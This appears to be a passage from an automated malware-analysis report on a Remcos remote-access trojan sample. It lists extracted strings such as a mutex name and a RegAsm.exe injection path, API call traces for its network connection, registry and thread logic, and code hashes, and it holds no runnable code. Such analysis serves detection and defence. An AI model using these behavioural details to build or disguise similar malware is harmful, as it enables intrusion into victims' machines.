                                  • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                  • API String ID: 1672879135-1420703245
                                  • Opcode ID: 8cd97c8272c32515dd58e6c83f2ed378f0f29c8542e5695a6fe97234da22fb66
                                  • Instruction ID: 756b6b72303f02f0a44bbd524559c36dcc88ee27c0131fa1ad94d22a553bdc8a
                                  • Opcode Fuzzy Hash: 8cd97c8272c32515dd58e6c83f2ed378f0f29c8542e5695a6fe97234da22fb66
                                  • Instruction Fuzzy Hash: 5862C572A00648EBDB057BB0AC599FE3B29EB84305F04447EF502A72D2DF784D458B6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00412407: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,73B743E0,0041BCB0,00000000), ref: 00412492
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,73B743E0,0041BCB0,00000000), ref: 0040C83F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000029), ref: 0040C855
                                  • atoi.MSVCRT ref: 0040C85C
                                  • Sleep.KERNEL32(00000000), ref: 0040C870
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416954,?), ref: 0040C884
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C898
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B50,?), ref: 0040C8CE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C8E5
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connecting to ,00000000,00000000,00415B50,00000000), ref: 0040C933
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040C943
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C950
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C961
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C975
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C981
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C99B
                                  • gethostbyname.WS2_32(00000000), ref: 0040C9A2
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9D7
                                  • atoi.MSVCRT ref: 0040C9DE
                                  • htons.WS2_32(00000000), ref: 0040C9E6
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA10
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA18
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA21
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA3E
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connected to ,00000000,00000000,00415B50,00000000), ref: 0040CA92
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040CAA2
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CAAC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CABD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAD1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CADD
                                  • sprintf.MSVCRT ref: 0040CB14
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B954), ref: 0040CB25
                                  • _itoa.MSVCRT ref: 0040CB37
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040CB50
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040CB5D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040CB66
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,?,00000104,00000000), ref: 0040CB83
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNEL32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNEL32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 0040CBA5
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 00409E7D: GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro), ref: 00409E8E
                                    • Part of subcall function 00409E7D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,?), ref: 0040CBCC
                                  • GetTickCount.KERNEL32 ref: 0040CC20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,0041B310,00000000,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000), ref: 0040CD07
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD17
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD27
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD37
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310), ref: 0040CD47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040CD57
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD67
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD77
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD87
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CD97
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDA7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CDB7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDC7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDD7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDE7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDF7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE07
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE17
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE27
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE37
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040CE57
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE67
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE77
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE87
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE97
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEA7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CEB7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEC7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CED7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEE7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEF7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF07
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF17
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF27
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF37
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF47
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF51
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004B), ref: 0040CF68
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF74
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF80
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF8C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF98
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFA4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFB0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFBC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFC8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFD4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFE0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFEC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFF8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D004
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D010
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D01C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D028
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D034
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D040
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D04C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D058
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D064
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D070
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D07C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D088
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D094
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0A0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0B8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0C4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0D0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0DC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0E8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0F4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D100
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D10C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D118
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D124
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D130
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D13C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D148
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D154
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D160
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D16C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D178
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D184
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D190
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D19C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1A8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1B4
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                    • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                    • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                    • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                    • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                    • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                    • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Disconnected!,?), ref: 0040D20B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040D21F
                                  • CreateThread.KERNEL32(00000000,00000000,00411A24,00000000,00000000,00000000), ref: 0040D240
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D249
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D252
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040D27E
                                  • atoi.MSVCRT ref: 0040D285
                                  • Sleep.KERNEL32(00000000), ref: 0040D293
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • String ID: %I64u$2.7.2 Pro$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected to $Connecting to $Disconnected!$[INFO]$name
                                  • API String ID: 43808216-3109502590
                                  • Opcode ID: df404ec401015cbb6a39c76b24060234d0af4cf8c9c06267c06abbf960c9cd09
                                  • Instruction ID: 574894a8069dd40dccd63d7f1e28fe1214fcfdb2903245f54546a53b35e7f031
                                  • Opcode Fuzzy Hash: df404ec401015cbb6a39c76b24060234d0af4cf8c9c06267c06abbf960c9cd09
                                  • Instruction Fuzzy Hash: 615244B2C0021DEBCB15BBA1EC49EDE777CEB54305F1081AAF416A3151EB745B89CB68
                                  Uniqueness
                                  • Uniqueness Score: -1.00%
                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00413626
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 0041365D
                                  • _wgetenv.MSVCRT ref: 0041366D
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00413678
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00413683
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041368F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413698
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136A1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136AA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 004136BE
                                  • _wgetenv.MSVCRT ref: 004136CE
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004136D9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004136E4
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004136F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136F9
